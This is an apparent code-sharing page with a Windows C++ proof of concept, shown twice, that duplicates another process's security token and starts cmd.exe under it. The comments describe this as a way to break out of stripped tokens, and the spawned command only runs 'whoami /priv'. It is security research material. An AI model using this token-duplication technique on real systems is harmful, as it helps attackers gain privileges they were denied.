ewilded · February 25, 2025 19:24
diff --git a/duplicate_token.cpp b/duplicate_token.cpp
 // Simple POC demonstrating one of the ways to create a process with a different security token of the same user and integrity (but with different privileges and/or group memberships, usually),
 // from a different process instead of inheriting it from this one. Related to https://hackingiscool.pl/breaking-out-from-stripped-tokens-using-process-injection/.
 // To compile:
 // "c:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvars64.bat"
 // cl.exe duplicate_token.cpp /EHsc /link Advapi32.lib

 #include <windows.h>
 #include <iostream>

 int main() 
 {
 	// Step 1: Get target PID
 	DWORD TARGET_PID = 0;
 	printf("Provide target PID:\n");
 	scanf("%d",&TARGET_PID);
 	
    // Step 2: Open the target process
    HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, TARGET_PID);
    if (hProcess == NULL)
 	{
 		printf("Failed to open target process");
 		return 0;
 	}	
    // Step 3: Open the process token
    HANDLE hToken = NULL;
 	if(!OpenProcessToken(hProcess, TOKEN_DUPLICATE, &hToken))
 	{
 		printf("Failed to open process token for duplication");
 		CloseHandle(hProcess);
 		return 0;
    }

    // Step 4: Duplicate the token as a primary token
    HANDLE hDupToken = NULL;
    SECURITY_ATTRIBUTES sa = { sizeof(SECURITY_ATTRIBUTES), NULL, FALSE };
    if(!DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, &sa, SecurityImpersonation, TokenPrimary, &hDupToken))
 	{
 		printf("Failed to duplicate token");
 		CloseHandle(hToken);
 		return 0;
 	}
    // Step 5: Use the duplicated token to create a new process
    STARTUPINFO si = { sizeof(STARTUPINFO) };
 	memset((void *)&si,0,sizeof(STARTUPINFO));
    PROCESS_INFORMATION pi = { 0 };
 	
 	char * cmdline = "cmd.exe /c whoami /priv > whoami_test.txt"; // Simple test: spawn a command prompt
    if(!CreateProcessAsUserA(hDupToken, NULL, cmdline, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
 	{
 		printf("Failed to create process with duplicated token");		
 	}           
 	else
 	{
 		printf("Successs. Now view whoami_test.txt.\n");
 	}
    CloseHandle(hDupToken);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return 0;
 }
	// Simple POC demonstrating one of the ways to create a process with a different security token of the same user and integrity (but with different privileges and/or group memberships, usually),
	// from a different process instead of inheriting it from this one. Related to https://hackingiscool.pl/breaking-out-from-stripped-tokens-using-process-injection/.
	// To compile:
	// "c:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvars64.bat"
	// cl.exe duplicate_token.cpp /EHsc /link Advapi32.lib

	#include <windows.h>
	#include <iostream>

	int main()
	{
	// Step 1: Get target PID
	DWORD TARGET_PID = 0;
	printf("Provide target PID:\n");
	scanf("%d",&TARGET_PID);

	// Step 2: Open the target process
	HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, TARGET_PID);
	if (hProcess == NULL)
	{
	printf("Failed to open target process");
	return 0;
	}
	// Step 3: Open the process token
	HANDLE hToken = NULL;
	if(!OpenProcessToken(hProcess, TOKEN_DUPLICATE, &hToken))
	{
	printf("Failed to open process token for duplication");
	CloseHandle(hProcess);
	return 0;
	}

	// Step 4: Duplicate the token as a primary token
	HANDLE hDupToken = NULL;
	SECURITY_ATTRIBUTES sa = { sizeof(SECURITY_ATTRIBUTES), NULL, FALSE };
	if(!DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, &sa, SecurityImpersonation, TokenPrimary, &hDupToken))
	{
	printf("Failed to duplicate token");
	CloseHandle(hToken);
	return 0;
	}
	// Step 5: Use the duplicated token to create a new process
	STARTUPINFO si = { sizeof(STARTUPINFO) };
	memset((void *)&si,0,sizeof(STARTUPINFO));
	PROCESS_INFORMATION pi = { 0 };

	char * cmdline = "cmd.exe /c whoami /priv > whoami_test.txt"; // Simple test: spawn a command prompt
	if(!CreateProcessAsUserA(hDupToken, NULL, cmdline, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
	{
	printf("Failed to create process with duplicated token");
	}
	else
	{
	printf("Successs. Now view whoami_test.txt.\n");
	}
	CloseHandle(hDupToken);
	CloseHandle(pi.hProcess);
	CloseHandle(pi.hThread);
	return 0;
	}